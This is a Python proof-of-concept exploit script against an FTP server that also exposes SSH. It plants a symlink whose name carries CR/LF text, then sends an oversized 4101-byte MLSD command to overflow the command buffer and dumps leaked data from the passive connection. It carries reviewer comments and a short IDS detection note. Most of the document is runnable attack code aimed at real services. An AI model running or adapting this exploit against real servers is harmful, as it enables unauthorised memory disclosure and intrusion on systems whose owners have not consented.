"""Proof-of-concept client against an FTP service that also exposes SSH.

Flow, as visible below: (1) over SSH, create a symlink under /home whose name
is a fragment of an FTP reply string; (2) over FTP, authenticate, request an
extended-passive data port (EPSV), provoke a fixed "530 ..." reply, then send a
single MLSD command padded to 4101 bytes; (3) dump whatever arrives on the
passive data connection.

Positional arguments (read from sys.argv below, in this order):
    ip          host running both the SSH and FTP services
    port        FTP control port (SSH is hard-coded to 22)
    username    account used for both SSH and FTP
    password    password for that account
    attack_dir  symlink target created under /home

Exits with status 1 on a bad argument count or when no EPSV port can be parsed.

Detection note: the control-channel signature is a PASS with no argument
followed immediately by an MLSD command line of more than 4 KiB, which no
legitimate client emits; an IDS rule on oversized FTP command lines catches it.
"""
from pwn import remote
import paramiko
import sys
import re

if len(sys.argv) != 6:
    # NOTE(review): the usage string lists no argument names; the expected
    # order is documented in the module docstring and in the argv reads below.
    print("Usage: python3 pure.py ")
    sys.exit(1)

ip = sys.argv[1]
# Left as a str; pwntools' remote() is expected to coerce it to int — confirm.
port = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
attack_dir = sys.argv[5]

# --- Phase 1: connect to ssh and create sym link -----------------------------
client = paramiko.SSHClient()
# AutoAddPolicy accepts any unknown host key without verification, so the
# password below is sent to whatever answers on ip:22; a known_hosts check
# (RejectPolicy / load_system_host_keys) is the safe default.
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    # Connect to the SSH server (port 22 is fixed; `port` is the FTP port)
    client.connect(ip, 22, username, password)
    # Shell snippet run remotely: the symlink name is built with bash $'...'
    # quoting and embeds CR/LF, so it spans two lines in a directory listing.
    command = f"""
    cd /home
    ln -snf {attack_dir} $'e can\\'t do that in the current session\\r\\nogin\\r\\n'
    """
    # Execute the command. The returned channels are never read, so a failing
    # `cd` or `ln` is silent here; close() in `finally` may also run before the
    # remote command has finished — confirm before relying on this ordering.
    stdin, stdout, stderr = client.exec_command(command)
except Exception as e:
    # Only reported, not fatal: the script proceeds to the FTP phase even if
    # the SSH step failed, so the later MLSD reply may not match expectations.
    print(f"An error occurred: {e}")
finally:
    # Close the SSH connection
    client.close()

# --- Phase 2: connect to ftp server & do exploit -----------------------------
session=remote(ip, port)

# authentication (the 331/230 replies are not read here; they are consumed by
# the recvuntil below together with the banner)
session.sendline(b"USER " + username.encode())
session.sendline(b"PASS " + password.encode())

# Send the extended passive mode request and capture the port number.
# RFC 2428 replies "229 Entering Extended Passive Mode (|||<port>|)", which
# the regex below extracts; recvuntil(b")") stops at that closing parenthesis.
session.sendline(b"EPSV")
response = session.recvuntil(b")").decode()
match = re.search(r'\|\|\|(\d+)\|', response)
if match:
    epsv_port = int(match.group(1))
    print(f"Extracted EPSV port: {epsv_port}")
else:
    print("No EPSV port found in the response.")
    session.close()
    sys.exit(1)

# Intentionally trigger an error message for a constant string in the reply buffer
session.sendline(b"PASS")
# Should reply: 530 We can't do that in the current session
print(session.recvline().decode())

# Overflow the cmd buffer: "MLSD -" right-padded with '.' to exactly 4101 bytes
payload=b"MLSD -".ljust(4101,b'.')
session.sendline(payload)
print(session.recvline().decode())

# Connect to pasv port for MLSD response
pasv=remote(ip,epsv_port)

# Read and print all lines from the passive connection until no more data.
# Assumes recvline(timeout=1) returns b'' on timeout (handled by `if not line`)
# and raises on EOF (handled by the except) — confirm against pwntools.
try:
    while True:
        try:
            line = pasv.recvline(timeout=1)
            if not line:
                print("END")
                break
            print(line.decode().strip())
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt and
            # UnicodeDecodeError; `except (EOFError, UnicodeDecodeError):`
            # would keep Ctrl-C working.
            break
finally:
    pasv.close()
    session.close()